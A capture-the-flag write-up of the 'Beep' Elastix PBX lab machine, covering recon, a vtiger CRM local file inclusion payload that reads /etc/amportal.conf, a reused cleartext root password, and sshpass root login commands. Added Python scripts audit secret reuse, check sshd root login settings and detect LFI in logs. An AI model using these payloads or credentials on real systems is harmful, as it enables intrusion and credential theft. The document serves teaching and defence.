Overview
Beep is an Easy-rated Linux machine running Elastix, a unified communications platform built on Asterisk PBX. The system exposes 15 services across a broad attack surface: SSH, HTTPS, SMTP, POP3, IMAP, MySQL, Webmin, HylaFAX, and the Asterisk Manager Interface. The entire stack dates from 2006 to 2008. CentOS 5.6 reached end-of-life in 2017.
The attack chain is a single step: the Elastix installation uses one password
(jEhdIekWmdjE) for every service, including root SSH. Direct root login
yields both flags without privilege escalation. A vtiger CRM local file
inclusion vulnerability (EDB-37637) exists and would disclose these credentials
from /etc/amportal.conf, but was confirmed only post-exploitation due to
TLS incompatibility between the attacker’s modern OpenSSL and the target’s
SSLv3/TLS 1.0.
Reconnaissance
The host blocks ICMP, requiring the -Pn flag for nmap:
nmap -sV -sC -Pn 10.129.229.183
| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 22 | SSH | OpenSSH 4.3 (protocol 2.0) | Legacy algorithms only |
| 25 | SMTP | Postfix smtpd | |
| 80 | HTTP | Apache httpd 2.2.3 (CentOS) | Redirects to HTTPS |
| 110 | POP3 | Cyrus pop3d 2.3.7 | |
| 143 | IMAP | Cyrus imapd 2.3.7 | |
| 443 | HTTPS | Apache httpd 2.2.3 (CentOS) | Elastix PBX login page |
| 993 | IMAPS | Cyrus imapd | |
| 995 | POP3S | Cyrus pop3d | |
| 3306 | MySQL | MySQL (unauthorized) | |
| 4190 | Sieve | Cyrus timsieved 2.3.7 | |
| 4445 | upnotifyp | Unknown | |
| 4559 | HylaFAX | HylaFAX 4.3.1 | |
| 5038 | Asterisk | Asterisk Call Manager 1.1 | |
| 10000 | HTTP | MiniServ 1.570 (Webmin) | Requires HTTPS |
Fifteen open ports. A complete unified communications stack.
Attack Surface Analysis
The broad service exposure creates multiple potential attack vectors:
vtiger CRM LFI (EDB-37637): The graph.php endpoint accepts a
current_language parameter passed to a PHP include() call without
sanitisation. A null byte truncates the appended suffix (works on PHP 5.1.6,
prior to the fix in PHP 5.3.4). The payload
../../../../../../../../etc/amportal.conf%00 retrieves the Elastix
configuration file containing all service passwords in cleartext.
Webmin Shellshock (CVE-2014-6271): Webmin 1.570 dispatches requests through CGI scripts processed by Bash. If the Bash version is unpatched, HTTP headers propagate into CGI environment variables, providing a command injection vector.
Universal password reuse: All Elastix services share a single password.
Both web-based vectors were blocked by a tooling barrier: the attacker’s OpenSSL 3.5 (Fedora 43) refuses SSLv3/TLS 1.0, and the target only supports those protocols. This is an interesting situation where modern security defaults on the attacker’s machine actually blocked the intended exploitation path, forcing an alternative approach.
The LFI payload for vtiger CRM would be:
GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action
The null byte (%00) truncates the appended file suffix because the target
runs PHP 5.1.6, prior to the fix in PHP 5.3.4 that eliminated null byte
injection in file operations.
| Attribute | Value |
|---|---|
| Vulnerability | Universal password reuse (CWE-522) |
| CVSS v3.1 | 9.8 (Critical) |
| Root cause | Single password for all services including root SSH |
| MITRE ATT&CK | T1078.001 (Valid Accounts: Default Accounts) |
Vulnerability Analysis
The /etc/amportal.conf file contains every credential for the Elastix
platform:
grep -E '(PASS|PASSWORD)' /etc/amportal.conf
# AMPDBPASS=jEhdIekWmdjE
# AMPMGRPASS=jEhdIekWmdjE
# FOPPASSWORD=jEhdIekWmdjE
# ARI_ADMIN_PASSWORD=jEhdIekWmdjE
The same password appears in every field. The administrator set one credential and reused it for MySQL, the Asterisk Manager Interface, the Flash Operator Panel, the Asterisk Recording Interface, and the root system account.
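The reuse is easy to spot by eye in a four-line grep, but an Elastix install has many more credential fields than that, and the same pattern hides in any key=value configuration. The following audit script is an added example, not part of the original writeup: it parses amportal.conf-style lines, picks out keys whose names look like secrets, and reports every group of keys that share one value without printing the value itself. The sample configuration and its placeholder password are constructed; the key names are the ones shown in the grep output above.

```python
import re
from collections import defaultdict

# Constructed sample in the KEY=VALUE style of /etc/amportal.conf.
# The password value is a placeholder, not the target's real credential.
SAMPLE_AMPORTAL = """\
# Asterisk database settings
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=SharedSecret1
AMPMGRUSER=admin
AMPMGRPASS=SharedSecret1
FOPPASSWORD=SharedSecret1
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=SharedSecret1
AMPWEBROOT=/var/www/html
"""

# Key names that are treated as secrets (assumption: PASS/PASSWORD/SECRET
# substrings cover the credential fields in this file format).
SECRET_KEY = re.compile(r"(PASS|PASSWORD|SECRET)", re.IGNORECASE)


def parse_kv(text):
    """Parse KEY=VALUE lines, skipping blanks and '#' comments.
    Assumes unquoted values, as in the amportal.conf excerpt on the page."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        result[key.strip()] = value.strip()
    return result


def find_reused_secrets(config):
    """Return {value: [keys...]} for every secret value used by two or more keys."""
    by_value = defaultdict(list)
    for key, value in config.items():
        if SECRET_KEY.search(key) and value:
            by_value[value].append(key)
    return {v: sorted(keys) for v, keys in by_value.items() if len(keys) > 1}


def audit(text):
    """Return human-readable findings. Values are deliberately not echoed,
    so the report can be filed without copying the secret into a ticket."""
    findings = []
    for keys in find_reused_secrets(parse_kv(text)).values():
        findings.append(f"{len(keys)} secrets share one value: {', '.join(keys)}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_AMPORTAL):
        print(finding)
```

Run against the real file as root (`python3 audit.py` with `SAMPLE_AMPORTAL` swapped for the file's contents); an empty result is the goal state after each service gets its own generated credential.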
Exploitation
SSH requires legacy algorithm negotiation. The attacker’s OpenSSH 10.0
disables ssh-rsa (SHA-1 based) by default. A temporary crypto-policy change
and custom SSH config are needed:
sudo update-crypto-policies --set LEGACY
cat /tmp/beep_ssh
# KexAlgorithms diffie-hellman-group14-sha1
# HostKeyAlgorithms ssh-rsa
# Ciphers aes128-ctr,aes256-ctr
# PubkeyAcceptedAlgorithms +ssh-rsa
# MACs hmac-sha2-256,hmac-sha1
sshpass -p 'jEhdIekWmdjE' ssh -F /tmp/beep_ssh \
-o StrictHostKeyChecking=no \
root@10.129.229.183 "id"
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Both flags captured in a single command:
ssh -F /tmp/beep_ssh root@10.129.229.183 \
"cat /home/fanis/user.txt; cat /root/root.txt"
# [flag redacted]
# [flag redacted]
Post-Exploitation
With root access, I confirm the LFI vulnerability that would have provided the password through the web interface:
ls -la /var/www/html/vtigercrm/graph.php
# -rw-r--r-- 1 asterisk asterisk 3771 Sep 19 2006 graph.php
The file exists at the expected path. The current_language parameter feeds
directly into include() without validation. On PHP 5.1.6, the null byte
truncation works as documented in EDB-37637. In a scenario without the TLS
incompatibility, this LFI would be the intended path to credential disclosure.
System enumeration reveals the age of the stack:
uname -a
# Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686
cat /etc/redhat-release
# CentOS release 5.6 (Final)
php -v
# PHP 5.1.6 (cli) (built: Nov 29 2010)
Linux 2.6.18, CentOS 5.6, PHP 5.1.6. Every component is well past end-of-life. The kernel build date of May 2011 confirms the system has not been updated in over a decade.
The Webmin Shellshock hypothesis (CVE-2014-6271) remains unconfirmed. Webmin
1.570 dispatches requests through CGI scripts processed by Bash. If the Bash
version is unpatched, HTTP headers (e.g. User-Agent) propagate into CGI
environment variables, providing a command injection vector. CentOS 5 did
receive a Shellshock patch (RHSA-2014:1306), so the vulnerability status is
unknown without capturing the Bash version. A future tester should verify
with bash --version and rpm -q bash.
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1078.001 | SSH root login from external IP (should be disabled entirely) |
| Credential access | T1552.001 | LFI reading /etc/amportal.conf (web server access logs) |
| Reconnaissance | T1046 | Port scan touching 15+ services from single source IP |
SSH: Root login via SSH should be disabled (PermitRootLogin no in
sshd_config). This single configuration change would have forced the
attacker through a more complex path.
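Setting PermitRootLogin no is only effective if sshd actually uses that line: sshd takes the first value it reads for each keyword, and any line appended to the end of sshd_config after a Match block belongs to that block rather than the global scope. The checker below is an added example, not part of the original writeup, and the sshd_config fragment it reads is constructed. It reproduces the first-value-wins rule, separates Match blocks from global settings, and reports whether root login is effectively disabled.

```python
import re

# Constructed sshd_config fragment: a hardening edit was appended at the
# bottom, but it lands inside the Match block and, even there, an earlier
# value for the same keyword already wins.
SAMPLE_SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes

Match Address 10.0.0.0/8
    PermitRootLogin without-password

# added by a hardening ticket; ineffective for both reasons above
PermitRootLogin no
"""


def effective_options(text):
    """Return (global_options, match_blocks) using sshd's rule that the
    first occurrence of a keyword wins. Keywords are lower-cased; both the
    'Key value' and 'Key=value' spellings are accepted."""
    global_opts = {}
    match_blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = {"criteria": value, "options": {}}
            match_blocks.append(current)
            continue
        target = global_opts if current is None else current["options"]
        target.setdefault(key, value)  # first value wins, later ones are ignored
    return global_opts, match_blocks


def check_root_login(text):
    """Return findings about root SSH login; an empty list means it is
    disabled globally and not re-enabled by any Match block."""
    global_opts, match_blocks = effective_options(text)
    findings = []
    value = global_opts.get("permitrootlogin")
    if value is None:
        findings.append("PermitRootLogin not set; the version default applies "
                        "(it was 'yes' before OpenSSH 7.0)")
    elif value.lower() != "no":
        findings.append(f"PermitRootLogin effectively '{value}' "
                        "(first occurrence wins; later lines are ignored)")
    for block in match_blocks:
        v = block["options"].get("permitrootlogin")
        if v and v.lower() != "no":
            findings.append(f"Match {block['criteria']} re-enables root login: "
                            f"PermitRootLogin {v}")
    return findings


if __name__ == "__main__":
    for finding in check_root_login(SAMPLE_SSHD_CONFIG):
        print(finding)
```

The authoritative check is still `sshd -T | grep -i permitrootlogin` on the host, which prints the effective value after sshd has parsed the file; the script is for reviewing configs offline or in a repository.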
LFI: Web application firewalls blocking path traversal sequences
(../) in query parameters would prevent the vtiger CRM LFI. The null byte
(%00) should also be blocked.
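A WAF rule is one control; the access log is the other, and it is the evidence source listed in the detection table above. The detector below is an added example, not part of the original writeup. It parses Apache combined-format lines, percent-decodes the request path repeatedly so that double-encoded traversal (`%252f`) is not missed, and flags traversal sequences, embedded null bytes and references to sensitive files such as /etc/amportal.conf. The log lines are constructed; the /etc/passwd double-encoded variant goes beyond the single payload shown on this page to illustrate the decoding caveat.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not from the target's logs).
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:10:00:02 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts HTTP/1.1" 200 9811 "-" "curl/7.29.0"
10.10.14.5 - - [01/Jan/2025:10:00:03 +0000] "GET /vtigercrm/graph.php?current_language=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2211 "-" "curl/7.29.0"
10.10.14.9 - - [01/Jan/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 410 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
# Files whose appearance in a request path is never legitimate (assumption:
# extend for the application being protected).
SENSITIVE = ("/etc/amportal.conf", "/etc/passwd", "/etc/shadow")


def fully_decode(s, rounds=3):
    """Percent-decode until stable so double-encoded payloads are visible."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_request(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m["path"])
    reasons = []
    if TRAVERSAL.search(decoded):
        reasons.append("path traversal")
    if "\x00" in decoded:  # %00 decodes to a real NUL byte
        reasons.append("null byte")
    for name in SENSITIVE:
        if name in decoded:
            reasons.append(f"sensitive file {name}")
    if not reasons:
        return None
    return {"ip": m["ip"], "status": int(m["status"]),
            "path": m["path"], "reasons": reasons}


def detect_lfi(log_text):
    """Scan a whole log and return the list of findings in log order."""
    return [f for f in (analyse_request(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in detect_lfi(SAMPLE_ACCESS_LOG):
        print(finding["ip"], finding["status"], ", ".join(finding["reasons"]))
```

A 200 status on a request that names a sensitive file is the high-priority signal: it suggests the include succeeded. Matching on the raw, undecoded path instead of the decoded one would miss the third line entirely.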
TLS: The fact that only SSLv3/TLS 1.0 is supported is itself a security finding. Modern clients refuse these protocols, but attackers with older tooling can still connect.
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Decommission or rebuild on a supported OS | High | Critical |
| P0 | Use unique passwords for each service | Low | Critical |
| P0 | Disable root SSH login | Low | Critical |
| P1 | Upgrade to TLS 1.2+ with modern cipher suites | Medium | High |
| P1 | Patch vtiger CRM or remove if unused | Medium | High |
| P2 | Reduce the service footprint: disable unused services (HylaFAX, Sieve, etc.) | Low | Medium |
| P3 | Implement network segmentation for PBX infrastructure | Medium | Medium |
CentOS 5.6 is well past end-of-life. The entire software stack is frozen at 2006-2008 patch levels. The correct remediation is decommissioning or a full rebuild on a supported distribution with modern PBX software.
Key Takeaways
- Universal password reuse is a critical vulnerability. A single password across 15 services means compromising any one service compromises all of them. Each service should have a unique, randomly generated credential stored in a secrets manager.
- Large attack surfaces multiply risk. Fifteen open ports mean fifteen opportunities for an attacker. Every unnecessary service is an additional attack vector. PBX systems should expose only the ports required for their function, with everything else firewalled.
- Tooling compatibility matters for both attackers and defenders. Modern OpenSSL refusing legacy TLS actually blocked the web-based attack paths. This is not a defence to rely on (attackers can use older tools), but it illustrates that deprecating insecure protocols has practical security benefits.